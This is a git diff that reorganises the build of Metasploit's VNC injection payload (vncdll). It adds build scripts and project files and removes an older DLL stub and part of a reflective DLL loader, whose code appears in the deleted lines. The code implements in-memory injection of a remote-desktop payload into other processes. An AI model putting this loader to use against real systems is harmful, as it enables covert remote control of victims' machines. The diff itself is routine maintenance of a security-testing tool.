diff --git a/data/vncdll.dll b/data/vncdll.dll
deleted file mode 100755
index f0bd4da8a5..0000000000
Binary files a/data/vncdll.dll and /dev/null differ
diff --git a/data/vncdll.x64.dll b/data/vncdll.x64.dll
index c8d1ff48d8..6922fb2511 100755
Binary files a/data/vncdll.x64.dll and b/data/vncdll.x64.dll differ
diff --git a/data/vncdll.x86.dll b/data/vncdll.x86.dll
new file mode 100755
index 0000000000..4dd5b516cd
Binary files /dev/null and b/data/vncdll.x86.dll differ
diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj
index 8bc56a0824..b04cb3b239 100644
--- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj
+++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj
@@ -70,7 +70,8 @@
/ignore:4070
- editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+exit 0
_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)
diff --git a/external/source/vncdll/loader/ReflectiveDll.c b/external/source/vncdll/loader/ReflectiveDll.c
deleted file mode 100644
index 46d0f9e24f..0000000000
--- a/external/source/vncdll/loader/ReflectiveDll.c
+++ /dev/null
@@ -1,73 +0,0 @@
-//===============================================================================================//
-// This is a stub for the actuall functionality of the DLL.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-
-#define EXITFUNC_SEH 0xEA320EFE
-#define EXITFUNC_THREAD 0x0A2A1DE0
-#define EXITFUNC_PROCESS 0x56A2B5F0
-
-#define DLL_METASPLOIT_ATTACH 4
-#define DLL_METASPLOIT_DETACH 5
-#define DLL_QUERY_HMODULE 6
-
-// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
-// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
-// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
-
-// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c)
-extern HINSTANCE hAppInstance;
-//===============================================================================================//
-extern DWORD DLLEXPORT Init(SOCKET socket);
-
-BOOL MetasploitDllAttach(SOCKET socket)
-{
- Init(socket);
- return TRUE;
-}
-
-BOOL MetasploitDllDetach(DWORD dwExitFunc)
-{
- switch (dwExitFunc)
- {
- case EXITFUNC_SEH:
- SetUnhandledExceptionFilter(NULL);
- break;
- case EXITFUNC_THREAD:
- ExitThread(0);
- break;
- case EXITFUNC_PROCESS:
- ExitProcess(0);
- break;
- default:
- break;
- }
-
- return TRUE;
-}
-
-BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
-{
- BOOL bReturnValue = TRUE;
- switch (dwReason)
- {
- case DLL_METASPLOIT_ATTACH:
- bReturnValue = MetasploitDllAttach((SOCKET) lpReserved);
- break;
- case DLL_METASPLOIT_DETACH:
- bReturnValue = MetasploitDllDetach((DWORD) lpReserved);
- break;
- case DLL_QUERY_HMODULE:
- if (lpReserved != NULL)
- *(HMODULE *) lpReserved = hAppInstance;
- break;
- case DLL_PROCESS_ATTACH:
- hAppInstance = hinstDLL;
- break;
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
- return bReturnValue;
-}
\ No newline at end of file
diff --git a/external/source/vncdll/loader/loader.rc b/external/source/vncdll/loader/loader.rc
deleted file mode 100644
index 678e8d5576..0000000000
--- a/external/source/vncdll/loader/loader.rc
+++ /dev/null
@@ -1,6 +0,0 @@
-
-#ifdef _X64_
-IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll"
-#else
-IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll"
-#endif
diff --git a/external/source/vncdll/loader/loader.vcproj b/external/source/vncdll/loader/loader.vcproj
deleted file mode 100644
index e6f368f2b4..0000000000
--- a/external/source/vncdll/loader/loader.vcproj
+++ /dev/null
@@ -1,445 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/external/source/vncdll/make.bat b/external/source/vncdll/make.bat
new file mode 100755
index 0000000000..fee7434034
--- /dev/null
+++ b/external/source/vncdll/make.bat
@@ -0,0 +1,32 @@
+@ECHO OFF
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
+
+IF "%1"=="x86" GOTO BUILD_X86
+IF "%1"=="X64" GOTO BUILD_X64
+
+ECHO "Building VNCDLL x64 and x86 (Release)"
+SET PLAT=all
+GOTO RUN
+
+:BUILD_X86
+ECHO "Building VNCDLL x86 (Release)"
+SET PLAT=x86
+GOTO RUN
+
+:BUILD_X64
+ECHO "Building VNCDLL x64 (Release)"
+SET PLAT=x64
+GOTO RUN
+
+:RUN
+PUSHD workspace
+msbuild.exe make.msbuild /target:%PLAT%
+POPD
+
+GOTO :END
+
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
+
+:END
diff --git a/external/source/vncdll/make.msbuild b/external/source/vncdll/make.msbuild
new file mode 100755
index 0000000000..ae4ea05084
--- /dev/null
+++ b/external/source/vncdll/make.msbuild
@@ -0,0 +1,19 @@
+
+
+
+ .\vncdll.sln
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/external/source/vncdll/output/vncdll.dll b/external/source/vncdll/output/vncdll.dll
deleted file mode 100644
index f0bd4da8a5..0000000000
Binary files a/external/source/vncdll/output/vncdll.dll and /dev/null differ
diff --git a/external/source/vncdll/output/vncdll.x64.dll b/external/source/vncdll/output/vncdll.x64.dll
deleted file mode 100644
index c8d1ff48d8..0000000000
Binary files a/external/source/vncdll/output/vncdll.x64.dll and /dev/null differ
diff --git a/external/source/vncdll/winvnc/vncdll.sln b/external/source/vncdll/vncdll.sln
old mode 100644
new mode 100755
similarity index 66%
rename from external/source/vncdll/winvnc/vncdll.sln
rename to external/source/vncdll/vncdll.sln
index 71cfe625d9..613b2fcbab
--- a/external/source/vncdll/winvnc/vncdll.sln
+++ b/external/source/vncdll/vncdll.sln
@@ -1,11 +1,10 @@
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
- ProjectSection(ProjectDependencies) = postProject
- {EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -15,19 +14,22 @@ Global
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
- {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32
+ {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
+ {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
diff --git a/external/source/vncdll/loader/LICENSE.txt b/external/source/vncdll/vncdll/LICENSE.txt
similarity index 100%
rename from external/source/vncdll/loader/LICENSE.txt
rename to external/source/vncdll/vncdll/LICENSE.txt
diff --git a/external/source/vncdll/loader/context.c b/external/source/vncdll/vncdll/context.c
old mode 100644
new mode 100755
similarity index 96%
rename from external/source/vncdll/loader/context.c
rename to external/source/vncdll/vncdll/context.c
index e617aa0c15..3d270c14bb
--- a/external/source/vncdll/loader/context.c
+++ b/external/source/vncdll/vncdll/context.c
@@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
{
do
{
- _snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
+ _snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );
diff --git a/external/source/vncdll/loader/context.h b/external/source/vncdll/vncdll/context.h
similarity index 100%
rename from external/source/vncdll/loader/context.h
rename to external/source/vncdll/vncdll/context.h
diff --git a/external/source/vncdll/loader/inject.c b/external/source/vncdll/vncdll/inject.c
old mode 100644
new mode 100755
similarity index 97%
rename from external/source/vncdll/loader/inject.c
rename to external/source/vncdll/vncdll/inject.c
index d0386434dc..3414584dc6
--- a/external/source/vncdll/loader/inject.c
+++ b/external/source/vncdll/vncdll/inject.c
@@ -1,7 +1,7 @@
#include "loader.h"
#include "ps.h"
#include "inject.h"
-#include "LoadLibraryR.h"
+#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include
// Simple trick to get the current meterpreters arch
diff --git a/external/source/vncdll/loader/inject.h b/external/source/vncdll/vncdll/inject.h
similarity index 100%
rename from external/source/vncdll/loader/inject.h
rename to external/source/vncdll/vncdll/inject.h
diff --git a/external/source/vncdll/loader/loader.c b/external/source/vncdll/vncdll/loader.c
old mode 100644
new mode 100755
similarity index 95%
rename from external/source/vncdll/loader/loader.c
rename to external/source/vncdll/vncdll/loader.c
index c7d7d2626e..251f548066
--- a/external/source/vncdll/loader/loader.c
+++ b/external/source/vncdll/vncdll/loader.c
@@ -5,11 +5,12 @@
#include "ps.h"
#include "session.h"
#include "inject.h"
-#include "ReflectiveLoader.h"
#define VNCFLAG_DISABLECOURTESYSHELL 1
#define VNCFLAG_DISABLESESSIONTRACKING 2
+#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
/*
* The HINSTANCE of this injected dll.
*/
@@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
hAgentProcess = hProcess;
- _snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );
+ _snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
} while( 0 );
diff --git a/external/source/vncdll/loader/loader.h b/external/source/vncdll/vncdll/loader.h
similarity index 100%
rename from external/source/vncdll/loader/loader.h
rename to external/source/vncdll/vncdll/loader.h
diff --git a/external/source/vncdll/vncdll/loader.rc b/external/source/vncdll/vncdll/loader.rc
new file mode 100755
index 0000000000..d4f53181d0
--- /dev/null
+++ b/external/source/vncdll/vncdll/loader.rc
@@ -0,0 +1,18 @@
+
+#ifdef _X64_
+
+#ifdef _DEBUG
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
+#else
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
+#endif
+
+#else
+
+#ifdef _DEBUG
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
+#else
+IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
+#endif
+
+#endif
\ No newline at end of file
diff --git a/external/source/vncdll/loader/ps.c b/external/source/vncdll/vncdll/ps.c
similarity index 100%
rename from external/source/vncdll/loader/ps.c
rename to external/source/vncdll/vncdll/ps.c
diff --git a/external/source/vncdll/loader/ps.h b/external/source/vncdll/vncdll/ps.h
similarity index 100%
rename from external/source/vncdll/loader/ps.h
rename to external/source/vncdll/vncdll/ps.h
diff --git a/external/source/vncdll/loader/session.c b/external/source/vncdll/vncdll/session.c
old mode 100644
new mode 100755
similarity index 93%
rename from external/source/vncdll/loader/session.c
rename to external/source/vncdll/vncdll/session.c
index 93d60aa471..c95cf7c11f
--- a/external/source/vncdll/loader/session.c
+++ b/external/source/vncdll/vncdll/session.c
@@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
{
if( !pProcessIdToSessionId )
{
- hKernel = LoadLibrary( "kernel32.dll" );
+ hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
}
@@ -53,7 +53,7 @@ DWORD session_activeid()
{
if( !pWTSGetActiveConsoleSessionId )
{
- hKernel = LoadLibrary( "kernel32.dll" );
+ hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel )
pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
}
@@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
CloseHandle( hToken );
}
- hKernel = LoadLibrary( "kernel32" );
+ hKernel = LoadLibraryA( "kernel32" );
if( !hKernel )
break;
diff --git a/external/source/vncdll/loader/session.h b/external/source/vncdll/vncdll/session.h
similarity index 100%
rename from external/source/vncdll/loader/session.h
rename to external/source/vncdll/vncdll/session.h
diff --git a/external/source/vncdll/vncdll/vncdll.vcxproj b/external/source/vncdll/vncdll/vncdll.vcxproj
new file mode 100755
index 0000000000..d97cda4a84
--- /dev/null
+++ b/external/source/vncdll/vncdll/vncdll.vcxproj
@@ -0,0 +1,245 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}
+ vncdll
+ Win32Proj
+
+
+
+ DynamicLibrary
+ v120_xp
+ false
+ MultiByte
+ true
+
+
+ DynamicLibrary
+ v120_xp
+ MultiByte
+
+
+ DynamicLibrary
+ v120_xp
+ false
+ MultiByte
+ true
+
+
+ DynamicLibrary
+ v120_xp
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>12.0.21005.1
+
+
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ true
+ $(ProjectName).$(PlatformShortName)
+
+
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ true
+ $(ProjectName).$(PlatformShortName)
+
+
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ false
+ false
+ $(ProjectName).$(PlatformShortName)
+
+
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ $(ProjectDir)$(Configuration)\$(Platform)\
+ false
+ false
+ $(ProjectName).$(PlatformShortName)
+
+
+
+ Disabled
+ WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)
+ ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+ Level3
+ EditAndContinue
+
+
+ true
+ Windows
+ MachineX86
+ Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)
+
+
+ _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)
+
+
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+exit 0
+
+
+
+
+ X64
+
+
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)
+ ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)
+ true
+ EnableFastChecks
+ MultiThreadedDebugDLL
+
+ Level3
+ ProgramDatabase
+
+
+ true
+ Windows
+ MachineX64
+ Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)
+
+
+ _X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)
+
+
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
+exit 0
+
+
+
+
+ MaxSpeed
+ true
+ WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)
+ ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)
+ MultiThreaded
+ true
+
+ Level3
+ ProgramDatabase
+ CompileAsC
+
+
+ _USING_V110_SDK71_;%(PreprocessorDefinitions)
+
+
+ Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)
+ $(OutDir)$(TargetName)$(TargetExt)
+ false
+ Windows
+ true
+ true
+ false
+ false
+ MachineX86
+
+
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"
+
+
+
+
+ X64
+
+
+ MaxSpeed
+ true
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)
+ ..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)
+ MultiThreaded
+ true
+
+ Level3
+ ProgramDatabase
+ CompileAsC
+
+
+ _X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions)
+
+
+ Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)
+ $(OutDir)$(TargetName)$(TargetExt)
+ false
+ Windows
+ true
+ true
+ false
+ false
+ MachineX64
+
+
+ editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ {ea6a09ac-04bb-423d-8842-ca48df901058}
+ false
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/vncdll/vncdll/vncdll.vcxproj.filters b/external/source/vncdll/vncdll/vncdll.vcxproj.filters
new file mode 100755
index 0000000000..b4f067d299
--- /dev/null
+++ b/external/source/vncdll/vncdll/vncdll.vcxproj.filters
@@ -0,0 +1,65 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {7c56685d-83b5-4541-b5dd-a620ffe19b23}
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hpp;hxx;hm;inl;inc;xsd
+
+
+ {6b6dd5ba-1f40-449f-a55b-7180bb0793a0}
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav
+
+
+
+
+ Source Files
+
+
+ Source Files
+
+
+ Source Files\core
+
+
+ Source Files\core
+
+
+ Source Files\core
+
+
+ Source Files\core
+
+
+
+
+ Header Files
+
+
+ Header Files
+
+
+ Header Files\core
+
+
+ Header Files\core
+
+
+ Header Files\core
+
+
+
+
+ Resource Files
+
+
+
\ No newline at end of file
diff --git a/external/source/vncdll/winvnc/ReflectiveDLLInjection.h b/external/source/vncdll/winvnc/ReflectiveDLLInjection.h
deleted file mode 100644
index d41b2ac323..0000000000
--- a/external/source/vncdll/winvnc/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,53 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
-#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-
-// we declare some common stuff in here...
-
-#define DLL_METASPLOIT_ATTACH 4
-#define DLL_METASPLOIT_DETACH 5
-#define DLL_QUERY_HMODULE 6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT __declspec( dllexport )
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/vncdll/winvnc/ReflectiveLoader.c b/external/source/vncdll/winvnc/ReflectiveLoader.c
deleted file mode 100644
index 9d69369824..0000000000
--- a/external/source/vncdll/winvnc/ReflectiveLoader.c
+++ /dev/null
@@ -1,457 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-//===============================================================================================//
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
-HINSTANCE hAppInstance = NULL;
-//===============================================================================================//
-#ifdef _WIN64
-#pragma intrinsic( _ReturnAddress )
-UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
-#endif
-//===============================================================================================//
-
-/*
- * Use Reflective DLL Injection.
- */
-#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
-// otherwise the DllMain at the end of this file will be used.
-
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
-// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
-
-// This is our position independent reflective DLL loader/injector
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
-#else
-DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
-#endif
-{
- // the functions we need
- LOADLIBRARYA pLoadLibraryA;
- GETPROCADDRESS pGetProcAddress;
- VIRTUALALLOC pVirtualAlloc;
- USHORT usCounter;
-
- // the initial location of this image in memory
- UINT_PTR uiLibraryAddress;
- // the kernels base address and later this images newly loaded base address
- UINT_PTR uiBaseAddress;
-
- // variables for processing the kernels export table
- UINT_PTR uiAddressArray;
- UINT_PTR uiNameArray;
- UINT_PTR uiExportDir;
- UINT_PTR uiNameOrdinals;
- DWORD dwHashValue;
-
- // variables for loading this image
- UINT_PTR uiHeaderValue;
- UINT_PTR uiValueA;
- UINT_PTR uiValueB;
- UINT_PTR uiValueC;
- UINT_PTR uiValueD;
-
- // STEP 0: calculate our images current base address
-
- // we will start searching backwards from our current EIP
-#ifdef _WIN64
- uiLibraryAddress = eip();
-#else
- __asm call geteip
- __asm geteip: pop uiLibraryAddress
-#endif
-
- // loop through memory backwards searching for our images base address
- // we dont need SEH style search as we shouldnt generate any access violations with this
- while( TRUE )
- {
- if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
- {
